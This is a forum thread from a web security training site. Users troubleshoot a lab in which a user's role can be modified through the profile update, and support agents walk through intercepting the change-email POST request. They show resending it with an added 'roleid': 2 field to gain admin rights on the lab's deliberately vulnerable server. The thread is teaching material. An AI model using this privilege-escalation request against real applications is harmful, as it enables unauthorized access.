Name is required.
Email address is required.
Invalid email address
Answer is required.
Exceeding max length of 5KB

How can I "Observe that the response contains your role ID."

Ludovico Dec 28, 2019 01:43PM UTC

Hi, I'm stuck at the fourth excercise of the Web Security Academy Lab.

https://portswigger.net/web-security/access-control/lab-user-role-can-be-modified-in-user-profile

SOLUTION:
Log in using the supplied credentials. [DONE]
Click on "My Account" and submit a new email address. [DONE]
Observe that the response contains your role ID. [NO, CAN'T OBSERVE ANYTHING.]

What I already did:
I went to Proxy--Option--Intercept Server Responses and enabled "Intercept responses based on the following rules". Then tried variuos combinations like this one:
"OPERATOR: Or;
MATCH TYPE: Content type header;
RELATIONSHIP: Matches;
CONDITION: json".
But it's useless, it show always only three responses. None of which show roleid. But they all did show at the end not-unicode characters like ”–Z>9h`Y{ý’¹ü@à˜Üê‡ÿØ+§¹Ù. Is this the way to display roleid? Should I use in some way the API key given to decode these characters?

Thanks for the attention.


Hannah Law Dec 31, 2019 11:17AM UTC Support Center agent

If you go to your HTTP history, you should see a POST request for your “change email” submission. If you click on that and navigate to the Response tab, you should see some JSON with the information required.

You could also turn Intercept on just before you press the update email button, which would save you having to go through your HTTP history.


Bob Jones Jan 06, 2020 09:26PM UTC
I'm having the same problem, though using browser dev tools instead of Burp Suite. I wonder if something has changed in the Lab files? In my HTTP history, I don't see any response data at all -- the "change email" submission just returns a 302 redirect back to the main store page (expected behavior as per the JavaScript code in changeEmail.js). No JSON data is provided from the server.

Also, submitting a "roleid": 2 value anyways causes an error on the server. I get a response back that either says "{"error":"Read timeout after 10000ms"}" with status code 400, or "Internal Server Error" with status code 500. I wonder if something on the back-end is not working correctly?

Any chance to verify this?

Thanks for the great exercises!

Ben Wright Jan 07, 2020 09:24AM UTC Support Center agent

Hi Bob,

I just tried this lab (using Burp) and was able to successfully solve it using the solution provided. As mentioned previously, the “change email” action should create a POST request in your HTTP history and the server response, for me, contains the following JSON:

{
“username”: “wiener”,
“email”: “test@hotmail.com”,
“apikey”: “9euwcuw2lUdnLBqaryQbdT9kBwvR4HqO”,
“roleid”: 1
}

I can then resend the POST request with the following JSON included in the body:

{"email":“test@hotmail.com”,“roleid”: 2}

Perhaps you could try to complete the lab using a version of Burp to see if that makes any difference?


Bob Jones Jan 08, 2020 01:36AM UTC
Hi Ben, thanks for the response. I've gotten the exercise to work using Python and by not following the redirects -- something the browser does automatically with no way I can find to prevent it. I assume Burp Suite does something similar under the covers and that is why it works with Burp.

Thanks!

Ben Wright Jan 08, 2020 08:38AM UTC Support Center agent

Hi Bob,

Yes, you are correct. The Burp Repeater tool, that is generally used to manipulate and reissue requests for testing, allows you to configure how redirects are handled with the default being that they are not followed automatically.

Glad to hear that you were able to solve the issue and proceed with the lab.

Please let us know if you require any further assistance with anything else in the future.


Post Your public answer

Your name
Your email address
Answer